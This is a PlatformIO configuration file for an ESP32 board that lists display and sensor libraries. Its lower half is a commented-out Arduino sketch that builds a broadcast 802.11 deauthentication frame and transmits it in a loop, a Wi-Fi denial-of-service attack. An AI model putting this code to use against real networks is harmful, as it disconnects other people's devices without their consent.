; PlatformIO Project Configuration File
;
;   Build options: build flags, source filter
;   Upload options: custom upload port, speed and extra flags
;   Library options: dependencies, extra library storages
;   Advanced options: extra scripting
;
; Please visit documentation for the other options and examples
; https://docs.platformio.org/page/projectconf.html

[env:esp32doit-devkit-v1]
platform = espressif32
monitor_speed = 115200
board = esp32doit-devkit-v1
framework = arduino
lib_deps = 
	adafruit/Adafruit SSD1306@^2.5.7
	adafruit/Adafruit Unified Sensor@^1.1.9
	moononournation/GFX Library for Arduino@^1.3.5
	adafruit/Adafruit SGP30 Sensor@^2.0.0
	madhephaestus/ESP32Encoder@^0.10.1



; 	#include <WiFi.h>

; uint8_t broadcast[6] = {0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF};
; const uint8_t deauthPacket[] = {
;   0xC0, 0x00, // Type and Subtype
;   0x00, 0x00, // Duration
;   0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, // Receiver Address
;   0x12, 0x34, 0x56, 0x78, 0x9A, 0xBC, // Transmitter Address
;   0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, // BSSID
;   0x00, 0x00, // Sequence Control
;   0x01, 0x00 // Reason Code: 1 (Unspecified Reason)
; };

; void setup() {
;   Serial.begin(115200);
;   delay(1000);
;   WiFi.mode(WIFI_STA);
;   WiFi.disconnect();
;   delay(100);
; }

; void loop() {
;   Serial.println("Sending Deauthentication Packet...");
;   WiFi.disconnect();
;   delay(100);
;   WiFi.begin("SSID", "password");
;   delay(100);
;   WiFi.disconnect();
;   delay(100);
;   esp_wifi_80211_tx(WIFI_IF_STA, deauthPacket, sizeof(deauthPacket), false);
;   delay(1000);
; }

